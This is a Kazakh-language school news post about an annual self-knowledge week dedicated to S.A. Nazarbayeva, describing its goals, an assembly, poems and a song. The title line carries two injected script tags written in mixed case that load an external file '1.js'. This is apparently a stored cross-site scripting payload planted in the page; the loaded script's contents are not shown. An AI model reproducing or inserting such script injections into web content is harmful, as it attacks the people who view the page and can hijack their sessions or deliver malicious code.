«Өзін-өзі тану: Махаббат пен Шығармашылық педагогикасы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
07.02.2020
«Өзін-өзі тану: Махаббат пен Шығармашылық педагогикасы»
Біздің мектепте жыл сайын «Өзін-өзі тану: Махаббат пен Шығармашылық педагогикасы» атты өзін-өзі тану апталығы өтеді. Апталық «Бөбек» республикалық балалар қайырымдылық қорының президенті, «өзін-өзі тану» пәнінің негізін қалаушы С.А. Назарбаеваға арналған.
Апталықтың мақсаты:
- Оқушыларды татулық пен ұйымшылдыққа баулу;
- Оқушылардың шығармашылық қабілеттерін дамыту;
- «Өзін-өзі тану» пәнін дәріптеу;
- Оқушыларды «Бөбек» республикалық балалар қайырымдылық қоры туралы ақпараттандыру.
3 ақпан күні «Өзін-өзі тану: Махаббат пен Шығармашылық педагогикасы» апталығына арналған салтанатты жиын өтті.
Салтанатты жиында С.А. Назарбаеваның өмірі мен қызмет жолы жайында презентация көрсетілді.
5-8-сынып оқушыдары бейбітшілік, махаббат, мейрімділік, ізгілік, Отан туралы, С.А.Назарбаева туралы өлеңдер оқыды. Соңында барлық оқушылар бірге «Ізгілік жолымен» әнін шырқады.
Просмотров: 993